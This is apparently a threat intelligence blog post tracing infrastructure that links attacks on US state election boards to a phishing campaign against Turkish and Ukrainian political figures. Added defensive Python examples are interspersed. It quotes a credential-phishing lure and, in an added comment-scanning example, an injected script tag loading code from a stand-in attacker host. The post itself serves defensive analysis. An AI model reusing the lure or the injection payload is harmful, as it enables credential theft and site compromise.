Can a BEAR Fit Down a Rabbit Hole?

ThreatConnect Identifies Infrastructure Nexus Between Attacks Against State Election Boards and Spearphishing Campaign Against Turkish, Ukrainian Governments

Read the full series of ThreatConnect posts following the DNC Breach: “Rebooting Watergate: Tapping into the Democratic National Committee“, “Shiny Object? Guccifer 2.0 and the DNC Breach“, “What’s in a Name Server?“, “Guccifer 2.0: the Man, the Myth, the Legend?“, “Guccifer 2.0: All Roads Lead to Russia“, “FANCY BEAR Has an (IT) Itch that They Can’t Scratch“, “Does a BEAR Leak in the Woods?“, and “Russian Cyber Operations on Steroids“.

The question on everyone’s mind: Who is behind the recently reported compromises of Arizona and Illinois’ state board of elections (SBOE)? The answer is, we don’t know.

When we reviewed FBI T-LD1004-TT, we initially found a pile of highly circumstantial evidence suggesting the adversary could be of Russian origin. The combination of attacks relying on widely available open source tools and the superficial involvement of Russian infrastructure left us thinking Russian attribution was plausible but not certain, as we were unable to determine with any confidence whether the attacks were criminally motivated or state-sponsored. We also were unable to identify any additional ties to malicious activity directed against any other state boards of elections.

However, as we looked into the 5.149.249[.]172 IP address within the FBI Flash Bulletin, we uncovered a spearphishing campaign targeting Turkey’s ruling Justice and Development (AK) Party, Ukrainian Parliament, and German Freedom Party figures from March – August 2016 that fits a known Russian targeting focus and modus operandi. As we explored malicious activity in the IP ranges around 5.149.249[.]172 we found additional linkages back to activity that could be evidence of Russian advanced persistent threat (APT) activity. This connection around the 5.149.249[.]172 activity is more suggestive of state-backed rather than criminally motivated activity, although we are unable to assess which actor or group might be behind the attacks based on the current evidence.

The timing of this activity is notable, as in mid-July Wikileaks published approximately 300,000 emails purportedly obtained via a compromise of the Turkish Justice and Development (AK) Party’s computer systems. Even so, we cannot definitively attribute the spearphishing campaign as the source of the leak. However, if Russian APT actors compromised and leaked AK Party emails, it would be consistent with Russian collection and influence operations that have recently focused on U.S. politics. Collection against the ruling Turkish party could provide Russia with intelligence that could inform diplomatic relations, military efforts in Eastern Europe, and ongoing military operations in Syria, while also potentially providing fodder for influence operations that could be used to publicly denigrate or defame politicians.

The graphic below visualizes what we know about the attacks by leveraging the Diamond Model of Intrusion Analysis (for a more whimsical example, see how we applied the Diamond Model to the destruction of the Death Star). The diamond in the center of the graphic shows the information originally shared about the attacks against the state boards of elections. The callout boxes radiating off the diamond highlight our main findings and their relevance to an attribution assessment.

Circumstantial Ties to Russia

Over the course of our research, we identified several strands that suggest – but do not prove – Russian origin:

Six of the eight IP addresses belong to a Russian-owned hosting service

5.149.249[.]172 hosted a Russian cybercrime market from January – May 2015

Other IPs belonging to FortUnix infrastructure – the same provider as 5.149.249[.]172 – were seen in 2015 Ukraine power grid and news media denial of service attacks

The Acunetix and SQL injection attack method closely parallel the video from a purported Anonymous Poland (@anpoland) handle describing how they obtained athlete records from Court of Arbitration for Sport (CAS).

Russian-Owned Hosting Service. Six of the domains identified in the FBI report are owned by King Servers (king-servers[.]com), a VPS/VDS hosting provider. While these IPs are physically located in the U.S. and The Netherlands, King Servers is based out of Russia and their website defaults to Russian language, as seen below. The use of a Russian VPS hosting service suggests, but does not definitively indicate, that the individuals behind the activity identified in the FBI report are Russian.

Additionally, DomainTools historical WHOIS information for the King Servers domain identifies that it was originally registered by “Vladimir Fomenko” from Biysk, Russia. A LinkedIn profile for Fomenko also identifies him as the CEO and founder of King Servers.

Tor Relay vs Tor Exit Node. One of the King Servers IPs, 185.104.9[.]39, was running an active Tor relay in August, at the time that the FBI report states it was identified in the intrusion of “another state’s Board of Election system.” This relay uses the nickname “villariba“ and is not an exit node. This is significant because, if an attacker were routing activity through Tor, the end IP identified in the intrusion would normally be the IP of an exit node. The fact that this IP hosts a Tor relay that is not an exit implies that the server at this address is either running an additional proxy service that the attackers used, or that the attackers actually control the server and may be in control of the Tor relay.
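The relay-versus-exit distinction above is something an analyst can check mechanically against Tor's published network-status data. The following is an added example, not ThreatConnect's code: it parses a constructed excerpt in the layout of a Tor consensus document (an "r" line per relay followed by an "s" line listing its flags) and classifies an observed source IP as an exit, a non-exit relay, or not a relay at all. Only the "villariba" nickname and the 185.104.9.39 address come from the post; the identity digests, timestamps, flags, and the second relay are made-up placeholders.

```python
"""Classify an observed IP against Tor consensus-style network status data."""
from typing import Dict, Optional

# Constructed sample in consensus "r"/"s"/"w" line layout. Identity and
# digest fields are placeholders; the flags are assumed for illustration.
SAMPLE_CONSENSUS = """\
r villariba AAAAAAAAAAAAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBB 2016-08-15 12:00:00 185.104.9.39 9001 0
s Fast Running Stable Valid
w Bandwidth=2000
r exampleexit CCCCCCCCCCCCCCCCCCCCCCCCCCC DDDDDDDDDDDDDDDDDDDDDDDDDDD 2016-08-15 11:30:00 192.0.2.10 443 80
s Exit Fast Guard Running Stable Valid
w Bandwidth=9000
"""


def parse_consensus(text: str) -> Dict[str, dict]:
    """Map relay IP -> {"nickname", "ip", "flags"} from consensus-style lines.

    "r" lines carry: nickname identity digest date time IP ORPort DirPort.
    The "s" line that follows lists the flags assigned to that relay.
    """
    relays: Dict[str, dict] = {}
    current: Optional[dict] = None
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        if parts[0] == "r" and len(parts) >= 9:
            current = {"nickname": parts[1], "ip": parts[6], "flags": set()}
            relays[parts[6]] = current
        elif parts[0] == "s" and current is not None:
            current["flags"].update(parts[1:])
    return relays


def classify_ip(ip: str, relays: Dict[str, dict]) -> str:
    """'exit' if the relay carries the Exit flag, 'relay' for a non-exit
    relay, 'none' if the address is not in the consensus at all."""
    entry = relays.get(ip)
    if entry is None:
        return "none"
    return "exit" if "Exit" in entry["flags"] else "relay"


def assess_observed_ip(ip: str, consensus_text: str) -> str:
    """Translate the classification into the interpretation used in the post:
    traffic seen from a non-exit relay did not leave the Tor network there."""
    kind = classify_ip(ip, parse_consensus(consensus_text))
    if kind == "exit":
        return "tor-exit: consistent with the attacker routing through Tor"
    if kind == "relay":
        return ("tor-relay-not-exit: traffic did not egress Tor here; "
                "consider a separate proxy on the host or direct control of it")
    return "not-a-tor-relay"


if __name__ == "__main__":
    for observed in ("185.104.9.39", "192.0.2.10", "198.51.100.7"):
        print(observed, "->", assess_observed_ip(observed, SAMPLE_CONSENSUS))
```

In practice the consensus text would come from a directory authority or a cached copy for the date of the intrusion, since relay flags change hourly; matching an IP against today's consensus says nothing reliable about what it was doing in August.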

IOC Previously Hosted Russian Cybercrime Forum. One of the domains previously hosted at 5.149.249[.]172 was rubro[.]cc, which is expired. However, a historical entry for this website in the Wayback Machine dated August 13, 2015 shows an HTTP 301 redirect to the website https[:]//rubro[.]biz/. This Russian-language website is called MarkeT RUBRO Ltd [sic], and uses the title “Форум rubro — Черный рынок криминал”, translating to “Forum rubro – Criminal Black Market.”

Other FortUnix Infrastructure Associated with BlackEnergy Activity. IP addresses 5.149.254[.]114 and 5.149.248[.]67 (both Netherlands), which are owned by the same FortUnix Networks company as 5.149.249[.]172, were previously identified in a Sentinel report and on VirusTotal respectively as being associated with BlackEnergyBot activity. Activity from these IPs has targeted the Ukrainian power grid and news media. Research into FortUnix Networks indicates that it is owned by HostZealot, a VPS and VDS hosting provider headquartered in Bulgaria, which operates at least 13 IP ranges in various European countries and Canada.

Overlap With Open Source Tools. The FBI report indicated that the attackers used Acunetix, SQL injection, and SQLmap to target the SBOE website(s). These tools and tactics, techniques, and procedures (TTPs) are consistent with those that @anpoland, a group that may be associated with Russian APT activity, used to scan the CAS’ website and exploit their databases. As these tools and methods are widely used, they are not attributable to one specific group; however, the timing of the SBOE and CAS activity suggests a circumstantial link between the two.

An Unexpected Development: 5.149.249[.]172 Hosting Spearphishing Attack Against Primarily Turkish, Ukrainian Government Targets

While we were unable to identify any additional information related to the state board of election attacks, reviewing hosting resolutions for the 5.149.249[.]172 IP address clued us into another target of these actors. Passive DNS analysis of this IP revealed domains typosquatting a website for Turkey’s ruling AK Party hosted between March and August 2016. Investigation of this typosquat took us down the rabbit hole that ultimately uncovered evidence of a recent spearphishing campaign primarily targeting individuals affiliated with Turkish and Ukrainian political organizations.

Passive DNS Analysis of 5.149.249[.]172. Two of the domains — akpartl.info[.]tr and supportmail.biz[.]tr — were hosted at the 5.149.249[.]172 IP address in 2016, during times consistent with the state board of election attacks. The akpartl.info[.]tr domain appears to spoof the legitimate domain belonging to the Turkish AK Party website, akparti.org[.]tr. At the time of writing, the spoofed domain redirects to a legitimate Turkish AK Party website, akpartiistanbul[.]com.
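The akpartl/akparti lookalike is a one-character substitution, which is exactly the kind of thing a brand-monitoring pass over passive DNS results can catch automatically. The block below is an added example, not ThreatConnect's code and not its Farsight integration: it extracts the registrable label from each candidate domain, computes an edit distance (optimal string alignment, so transpositions count as one edit) against the protected domain's label, and reports lookalikes and alternate-suffix variants. The candidate list mixes domains named in the post with constructed entries, and the suffix table is a deliberately short stand-in for the Public Suffix List.

```python
"""Flag typosquats of a protected domain in a list of passive-DNS names."""
from typing import Iterable, List, Tuple

# Short stand-in for the Public Suffix List (assumption for this example).
SUFFIXES = ("org.tr", "info.tr", "biz.tr", "com.tr", "com", "net", "example")

# Constructed candidate list: the first four names are from the post, the
# last two are made up to exercise the transposition and suffix cases.
CANDIDATES = [
    "akparti.org.tr",
    "akpartl.info.tr",
    "ksdafoiuf9w54ygdjoi.akpartl.info.tr",
    "supportmail.biz.tr",
    "akpatri.org.tr",
    "akparti.com",
]


def split_domain(domain: str) -> Tuple[str, str]:
    """Return (registrable_label, suffix), matching the longest known suffix."""
    domain = domain.lower().rstrip(".")
    for suffix in sorted(SUFFIXES, key=len, reverse=True):
        if domain.endswith("." + suffix):
            label = domain[: -len(suffix) - 1].split(".")[-1]
            return label, suffix
    raise ValueError(f"unknown suffix for {domain}")


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, or
    transpose two adjacent characters, each at cost 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def find_typosquats(legit: str, candidates: Iterable[str],
                    max_distance: int = 1) -> List[Tuple[str, str]]:
    """Return (domain, reason) for candidates that look like the legit domain.

    A candidate whose label equals the legit label but sits under another
    suffix is reported as a suffix variant; otherwise it is reported when the
    label is within max_distance edits of the legit label.
    """
    legit_label, legit_suffix = split_domain(legit)
    hits: List[Tuple[str, str]] = []
    for cand in candidates:
        try:
            label, suffix = split_domain(cand)
        except ValueError:
            continue  # unknown suffix: cannot isolate the registrable label
        if label == legit_label:
            if suffix != legit_suffix:
                hits.append((cand, "suffix-variant"))
            continue
        dist = osa_distance(label, legit_label)
        if dist <= max_distance:
            hits.append((cand, f"edit-distance-{dist}"))
    return hits


if __name__ == "__main__":
    for domain, reason in find_typosquats("akparti.org.tr", CANDIDATES):
        print(f"{domain:40} {reason}")
```

A distance threshold of 1 keeps false positives low for a seven-character label; for longer brand names a threshold of 2 is common, and names such as supportmail.biz.tr, which spoof by theme rather than by spelling, need a separate keyword or hosting-overlap check.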

The mail server for this spoofed domain, mail.akpartl.info[.]tr, leverages Moscow-based webmail provider Yandex as a mail exchanger. According to Shodan, this host is running a Simple Mail Transfer Protocol (SMTP) Postfix service.

The other domain recently hosted at the 5.149.249[.]172 IP address, supportmail.biz[.]tr, also appears to have been used against the Turkish AK Party. This domain currently redirects to the aforementioned akpartiistanbul[.]com legitimate domain.

Both of these domains were registered in January 2016 and later resolved to, and probably were operationalized from, the 5.149.249[.]172 IP address. This timing is significant as the AK Party was a recent victim of a July 2016 email leak by Wikileaks. However, to identify a more substantial link between 5.149.249[.]172 IP address and the ultimate leak on Wikileaks, we had to delve further into the akpartl.info[.]tr spoofed domain.

Chasing the Rabbit Down its Hole

Leveraging ThreatConnect’s Farsight Passive DNS integration, we were able to identify that several subdomains exist for the akpartl.info[.]tr spoofed domain, including ksdafoiuf9w54ygdjoi.akpartl.info[.]tr.

Visiting the ksdafoiuf9w54ygdjoi.akpartl.info[.]tr subdomain directs the visitor to ksdafoiuf9w54ygdjoi.akpartl.info[.]tr/admins/sign_in where an instance of Phishing Frenzy, an open source phishing framework, is running. Note the title and footer of the page in the screenshot below.

After some investigation, we navigated to hxxp://ksdafoiuf9w54ygdjoi.akpartl.info[.]tr/letter_opener, which displayed a list of what appears to be all of the emails these actors have sent in this campaign.

There were 113 emails listed between March 22, 2016 and August 03, 2016. The bulk of the emails were sent between March 22 and April 20, 2016.

From the 34 victim email addresses that were found on the command and control server, two stood out as unusual: ali.bolduin[@]yandex[.]com and deputat.babiy[@]gmail[.]com. These two email addresses were found in the very earliest phishing email templates. They do not appear to be connected with a specific target or individual found in open sources. We believe that these two addresses were used to test the phishing attacks before sending the spearphish to an actual target. The use of a Yandex account for testing purposes, coupled with akpartl.info[.]tr’s aforementioned use of a Yandex mail exchanger, provides evidence that the individuals behind this activity are clearly leveraging and abusing Russian services to test and carry out attacks.

Out of the 113 total emails, 48 of them are Gmail-themed, designed to look like Gmail security emails in order to collect a victim’s Google account information. The rest are specifically designed to look like an email from an organization with which the target is affiliated or ostensibly interested. At least 16 of the emails are designed to look like AK Party emails. There is one email that has a LinkedIn theme and another that is Intel Corporation themed. The email bodies are written in a variety of languages including Turkish, English, Ukrainian, and German. Based on the email bodies and the intended recipients, targets of this spearphishing campaign included individuals in the AK Party, Verkhovna Rada (Parliament) of Ukraine, and German Freedom Party (Die Freiheit). Of note, 16 of the AK Party officials targeted in this campaign show up in the July 19 WikiLeaks dump of nearly 300,000 AK Party emails that included over 1400 AK Party email accounts.

Included below are some screenshots of emails from this Phishing Frenzy site.

The Gmail-themed emails, roughly translated, read something like:

“Hello user!

Your account is blocked for violating of terms of service of our company.

In the period from 03/29/2016 to 04/01/2016 it was observed that your account has sent mass email advertisements.

Perhaps you did not, and attackers using special programs to send spam, used your data (email address, name). If you have not sent any emails, go to this link and follow the instructions.

Your account is under control.

You can view and adjust your privacy settings at any time in Your account ..

Do not reply to this letter. If you have any questions, please contact technical support.

Technical Services Manager”

Almost all of the links in the phishing emails lead to a subdomain on the srvddd[.]com host, which currently has a handful of phishing domains resolving to it, like the one shown below.

srvddd[.]com was registered using the email address vittorio_80@mail[.]com and is currently hosted at the 5.149.248[.]193 IP address, which is in the same range as the aforementioned FortUnix Networks IP addresses. While not unique, the use of a 1&1 mail.com email address to register a domain is a TTP consistent with recent FANCY BEAR activity. Based on passive DNS, there are several subdomains for the srvddd[.]com domain that most likely have been used in such operations dating back to November 2014. A DomainTools screenshot of srvddd[.]com dated May 9, 2015 shows that a directory named “mail.solydarnist.org” was present on the server, suggesting it was used to target solydarnist[.]org, the official website of the political party of incumbent Ukrainian President Petro Oleksiyovych Poroshenko.
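The pivot just described, from a phishing domain to a registrant address and a neighbouring netblock, is a graph problem: indicators that share a hosting IP, an exact registrant address, or membership in a watched range belong to one cluster. The following is an added example, not ThreatConnect's code or platform. It builds that graph with a union-find structure over constructed WHOIS-style records: the domains, the two FortUnix addresses and the vittorio_80@mail.com registrant come from the post, while the other registrant values, the two "example" domains, and the 5.149.248.0/21 block boundary are assumptions made for illustration.

```python
"""Cluster indicators that share hosting, registrant, or netblock attributes."""
import ipaddress
from collections import defaultdict
from typing import Dict, FrozenSet, Iterable, List

# Constructed records. Registrant values other than vittorio_80@mail.com and
# the "*.example" domains are made up for this example.
RECORDS = [
    {"domain": "srvddd.com", "ip": "5.149.248.193", "registrant": "vittorio_80@mail.com"},
    {"domain": "akpartl.info.tr", "ip": "5.149.249.172", "registrant": "privacy-proxy@example.invalid"},
    {"domain": "supportmail.biz.tr", "ip": "5.149.249.172", "registrant": "privacy-proxy@example.invalid"},
    {"domain": "second-lure.example", "ip": "198.51.100.9", "registrant": "vittorio_80@mail.com"},
    {"domain": "unrelated-shop.example", "ip": "203.0.113.25", "registrant": "owner@example.invalid"},
]

# Assumed netblock of interest: the post only says the IPs share a range.
WATCHED_RANGES = [ipaddress.ip_network("5.149.248.0/21")]

# Registrant addresses that many unrelated domains share (privacy proxies,
# registrar defaults) must not create links, or everything collapses together.
WEAK_REGISTRANTS: FrozenSet[str] = frozenset({"privacy-proxy@example.invalid"})


class DisjointSet:
    """Minimal union-find with path halving."""

    def __init__(self) -> None:
        self.parent: Dict[str, str] = {}

    def find(self, x: str) -> str:
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]
            x = self.parent[x]
        return x

    def union(self, a: str, b: str) -> None:
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[ra] = rb


def cluster_indicators(records: Iterable[dict],
                       watched_ranges: Iterable[ipaddress.IPv4Network],
                       weak_registrants: FrozenSet[str] = frozenset()) -> List[List[str]]:
    """Return connected components over domain:, ip:, email: and range: nodes."""
    ds = DisjointSet()
    for rec in records:
        dom, ip = "domain:" + rec["domain"].lower(), "ip:" + rec["ip"]
        ds.union(dom, ip)                       # a domain is tied to its host
        reg = rec["registrant"].lower()
        if reg not in weak_registrants:
            ds.union(dom, "email:" + reg)       # exact registrant match only
        addr = ipaddress.ip_address(rec["ip"])
        for net in watched_ranges:
            if addr in net:
                ds.union(ip, "range:" + str(net))
    groups: Dict[str, set] = defaultdict(set)
    for node in list(ds.parent):
        groups[ds.find(node)].add(node)
    return [sorted(g) for g in groups.values()]


def same_cluster(clusters: List[List[str]], a: str, b: str) -> bool:
    return any(a in c and b in c for c in clusters)


if __name__ == "__main__":
    for group in cluster_indicators(RECORDS, WATCHED_RANGES, WEAK_REGISTRANTS):
        print(group)
```

Note what does and does not link here: srvddd.com joins the akpartl.info.tr cluster only because of the watched range, and second-lure.example joins because it shares the exact registrant address. The post's observation that a mail.com address was used at all is a TTP overlap, not a pivot, so the example links on address equality only; shared provider alone would connect every domain registered from that provider.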

Another sample of a historical Ukraine-related malicious targeting attempt using srvddd[.]com is found at http[:]//privatbank-info.io[.]ua/journal.php, where a user “bordan” posted an HTML tag inside a comment, attempting to induce a cross-site scripting (XSS) attack that would load the JavaScript found at http[:]//onlysoop.srvddd[.]com/fone/script.js. This suggests that the domain may have been used for other attacks beyond the credential harvesting emails identified in the Phishing Frenzy campaign.
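A comment that carries a script tag pointing at a third-party host is easy to spot when reviewing a site's stored comments, and equally easy to neutralize by escaping user input before rendering it. The block below is an added example, not code from the post or from the site mentioned: it parses a comment body with the standard-library HTML parser, reports any active-content tags whose source is off-site along with inline event handlers, and shows the escaped form that a template should render instead. The sample comments and the cdn.attacker.invalid host are constructed.

```python
"""Triage stored comments for off-site script references; render them safely."""
import html
from html.parser import HTMLParser
from typing import Dict, List, Set
from urllib.parse import urlparse

# Tags that fetch or execute content when rendered, and the attributes that
# name the remote resource.
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "img", "link"}
SOURCE_ATTRS = {"src", "href", "data"}

# Constructed samples: a benign comment and an injected script tag pointing
# at a placeholder attacker host.
BENIGN_COMMENT = "Thanks for the article, very helpful."
INJECTED_COMMENT = ('Great bank! <script src="http://cdn.attacker.invalid/fone/script.js">'
                    "</script> <img src=\"/images/logo.png\" onerror=\"alert(1)\">")


class ExternalRefCollector(HTMLParser):
    """Collect off-site resource hosts and inline event handlers in a fragment."""

    def __init__(self, site_host: str) -> None:
        super().__init__()
        self.site_host = site_host.lower()
        self.external_hosts: Set[str] = set()
        self.event_handlers: List[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on"):
                self.event_handlers.append(f"{tag}@{name}")
            if tag.lower() in ACTIVE_TAGS and name in SOURCE_ATTRS and value:
                host = urlparse(value.strip()).hostname
                # Relative URLs have no host and stay on-site; skip them.
                if host and host.lower() != self.site_host:
                    self.external_hosts.add(host.lower())


def scan_comment(comment_html: str, site_host: str) -> Dict[str, object]:
    """Return the off-site hosts and event handlers found in one comment."""
    parser = ExternalRefCollector(site_host)
    parser.feed(comment_html)
    parser.close()
    return {
        "external_hosts": sorted(parser.external_hosts),
        "event_handlers": list(parser.event_handlers),
        "suspicious": bool(parser.external_hosts or parser.event_handlers),
    }


def render_safely(comment_text: str) -> str:
    """Escape a comment so the browser shows markup as text instead of running it."""
    return html.escape(comment_text, quote=True)


if __name__ == "__main__":
    for body in (BENIGN_COMMENT, INJECTED_COMMENT):
        print(scan_comment(body, "privatbank-info.io.ua"))
        print(render_safely(body))
```

The scanner is a triage aid for comment stores that already contain untrusted HTML; the durable fix is the second function, applied at output time, so that an injected tag is displayed rather than executed regardless of which host it references.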

There is one link that does not direct to a subdomain of srvddd[.]com. Instead, this link points visitors to http://mail.akpartl.info[.]tr:35000/login2/loginpage – a credential harvesting page designed to look like a login page for a Kerio Connect webmail client. Submitting this form redirects victims to mail.akpartiistanbul[.]com:35000/webmail/login2/loginpage, the legitimate Kerio Connect login page for an actual AK Party website.

Based on these developments, we can expand our original diamond model graphic to show how new infrastructure and capabilities were leveraged to target additional victims.

Discussion, Analysis, and Conclusions

Since we started researching the DNC breach back in June, this story has taken us on one crazy turn after another. We have identified links between breaches and outlets for strategic leaks that give us greater confidence in our attribution assessments. That said, this chapter feels like the most bizarre yet and leaves us with more questions than answers, including:

How Widespread Is the Targeting Effort Against State Boards of Elections? So far we know of two, but we do not know whether Arizona and Illinois are the only targets or merely the ones that have come to light.

Does the Reliance on Open Source Tools Reflect an Inexperienced Adversary or an Adaptive Adversary? Using open source tools may indicate an adversary that cannot create its own custom tools. It can also reflect an adversary that intentionally leverages open source tools for operational security purposes, such as avoiding attribution or avoiding the exposure of sensitive tools or methods.

Are the Attackers Really After Voter Registration Information or Was This a Phase One Operation? Without clear attribution to a specific actor or APT group, we cannot determine the actors’ motivations, what they would ultimately seek to do with any collected intelligence, or whom they might later target with it.

Is There a Relationship Between the AK Party Spearphishing Effort and the WikiLeaks Dump of AK Party Emails? There’s an overarching storyline that seems appealing here: a major political party in a country with a strained geopolitical relationship with Moscow gets hacked and large amounts of embarrassing data gets dumped on a leak website. However, there is much less evidence available to weigh with the AK Party emails than the DNC breach.

Further complicating the situation, Phineas Fisher, a hacktivist who gained notoriety for his hacks against Gamma Group and Hacking Team, claimed he compromised the AK Party and provided their emails to Wikileaks. At this time, we cannot refute or verify Phineas Fisher’s claims, and Wikileaks is the only authoritative source that can confirm his involvement. If Phineas Fisher’s claims are false, it would strengthen the argument that the Phishing Frenzy activity ultimately resulted in the leak. If Phineas Fisher’s claims are true, there are three conceivable explanations for the situation:

Phineas Fisher and the actors behind the activity in the FBI report both targeted and compromised the AK Party.

Phineas Fisher was the only one to actually compromise the AK Party, and none of the aforementioned Phishing Frenzy efforts were successful.

Phineas Fisher and the actors behind the activity in the FBI report are connected.

If a Russian APT group is conducting this activity seeking to hack the ruling Turkish political party, collected intelligence and follow-on operations could ultimately allow for the following:

Informed Diplomatic Relations – Russia’s diplomatic relations with Turkey are integral given their close proximity and Turkey’s status as a NATO member. Having insider intelligence from the ruling party detailing Turkey’s foreign relations and diplomatic efforts can inform Russia’s own foreign relations as well.

Informed Military Efforts – Turkey’s geographical location, situated south of Russia between the Middle East and Eastern Europe, means that it is a key piece to Russian military efforts in the region. For example, intelligence from the AK Party could ultimately inform Russia’s military preparations and actions in Syria.

Influence Operations or Leverage – Similar to Russian APT influence operations against the U.S. Democratic Party, Russia may seek to release some compromised intelligence to sway public opinion or defame political ideologies in a country that is integral to Russia’s foreign policy.

Retaliations or Leverage – As evidenced by Russia’s efforts against the World Anti-Doping Agency and CAS, Russia may seek to publicly or privately denigrate or influence individuals or organizations that cast a negative light on Russia. Similarly, sensitive and incriminating information that might be compromising could be held over party members’ or leaders’ heads with the threat of public disclosure.

So how did we get from the SBOE to Turkish AK Party? As you can see, it’s a long story, but the takeaway is this: Whether it is to ultimately collect intelligence, influence public opinion, or sow discord, doubt, or contempt with respect to political ideologies — the individuals behind this activity, whoever they may be, are looking to manipulate multiple countries’ democratic processes.

Based on the information available, the degree of Russian sanction or sponsored involvement in either event is unclear; however, it is clear that Russian-based infrastructure has been identified in part – and thus, with Russia’s new “Yarovaya package“ authorities, they are now in a position to help fill in the missing details. Because a wise Russian once said, “We in Russia are used to investigating first, before accusing anyone of anything. We believe it is more logical and more correct.“

ThreatConnect is sharing details of the indicators associated with this activity within ThreatConnect Incident 20160829C: